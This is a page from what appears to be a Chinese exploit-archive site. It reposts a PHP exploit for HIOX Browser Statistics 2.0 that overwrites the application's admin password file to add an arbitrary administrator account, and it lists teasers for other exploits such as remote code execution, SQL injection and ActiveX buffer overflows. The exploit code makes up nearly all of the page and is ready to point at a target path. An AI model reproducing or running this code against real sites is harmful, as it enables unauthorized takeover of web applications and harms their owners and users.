HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit

所属分类: 网络安全 / Exploit 阅读数: 109
收藏 0 赞 0 分享
<?php
@session_start();
?>
<table align=center width=72% height=95% ><tr><td>
<?php
/*
HIOX Browser Statistics 2.0 Arbitrary Add Admin User Vulnerability
[~] Discoverd & exploited by Stack
[~]Greeatz All Freaind
[~]Special thnx to Str0ke
[~] Name Script : HIOX Browser Statistics 2.0
[~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip
You need to change http://localhost/path/ with the link of script it's very importent
*/
$creat = "true";
$iswrite = $_POST['createe'];
if($user=="" && $pass==""){
if($iswrite == "creatuser")
{
$usname = $_POST['usernam'];
$passwrd = md5($_POST['pword']);
if($usname != "" && $passwrd != ""){
$filee = "http://localhost/path/admin/passwo.php";
$file1 = file($filee);
$file = fopen($filee,'w');
fwrite($file, "<?php \n");
fwrite($file, "$");
fwrite($file, "user=\"$usname\";\n");
fwrite($file, "$");
fwrite($file, "pass=\"$passwrd\";");
fwrite($file, "\n?>");
fclose($file);
$creat = "false";
echo "<div align=center style='color: green;'><b>New User Created
<meta http-equiv=\"refresh\" content=\"2; url=http://localhost/path/admin/index.php\">
<br>Please Wait You will be Redirected to Login Page
</div>";
}
else{
echo "<div align=center style='color: red;'><b>Enter correct Username or Password </div>";
}
}
if($creat == "true"){
?>
<table align=center valign=center bgcolor=000000 align=center cellpadding=0 style="border: 1px #000000 solid;">
<tr width=400 height=20><td align=center bgcolor="000000"
style="color: ffffff; font-family: arial,verdana,san-serif; font-size:13px;">
Create New User </td></tr>
<tr width=400 height=20><td>
<form name=setf method=POST action=<?php echo $PHP_SELF;?>>
<table style="color:#ffffff; font-family: arial,verdana,san-serif; font-size:13px;">
<tr><td>User Name</td><td><input class="ta" name="usernam" type=text maxlength=20 >
</td></tr>
<tr><td>Password</td><td><input class="ta" name="pword" maxlength=20 type=password></td></tr>
<input name="createe" type=hidden value="creatuser"></td></tr>
<tr><td></td><td><input type=submit value="create"></td></tr>
</table>
</form>
</td></tr></table>
<?php
}
}else{
echo "<div align=center style='color: red;'><b>User Already Exist</div>";
}
?>
</td></tr></table>

更多精彩内容其他人还在看

LoveCMS 1.6.2 Final Remote Code Execution Exploit

#!/usr/bin/ruby # ## Exploit by PoMdaPiMp! ## --------------------- ## pomdapimp(at)gmail(dotcom) ## ## LoveCMS Exploi
收藏 0 赞 0 分享

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

#!/usr/bin/perl # carved-out by: crit3rion, just making th3 world a b3tt3r plac3! # Xerox_Remote_DoS.20080801.ver01 (tanx to dr0pz0N3
收藏 0 赞 0 分享

moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

#!/usr/bin/perl # # moziloCMS 1.10.1 Perl exploit # # discovered & written by Ams # ax330d [doggy] gmail [dot] com # # DESCRIP
收藏 0 赞 0 分享

Joomla Component EZ Store Remote Blind SQL Injection Exploit

#!/usr/bin/perl #Note:Sometimes you have to change the regexp to viewcategory/catid,".$cid." use LWP::UserAgent; use Get
收藏 0 赞 0 分享

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

<!-- In addition to the overflow found in the "Friendly Technologies" dialers ActiveX, Here is a "remote command execu
收藏 0 赞 0 分享

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

<!-- "Friendly Technologies" provide software like L2TP and PPPoE clients to ISPs, who give the software to their customers
收藏 0 赞 0 分享

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

/* * IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Expoit * * Discovered & Written by r0ut3r (writ3r [at] gmail.com) *
收藏 0 赞 0 分享

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

----------------------------------------------------------------------------- Ultra Office ActiveX Control Remote Buffer Overflow url:
收藏 0 赞 0 分享

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote Buffer Overflow Exploit Author: Koshi Original POC: http://www.milw0rm.com/exploi
收藏 0 赞 0 分享

MyBulletinBoard (MyBB)

<?php // forum mybb <= 1.2.11 remote sql injection vulnerability // bug found by Janek Vind "waraxe" http://www.waraxe
收藏 0 赞 0 分享
查看更多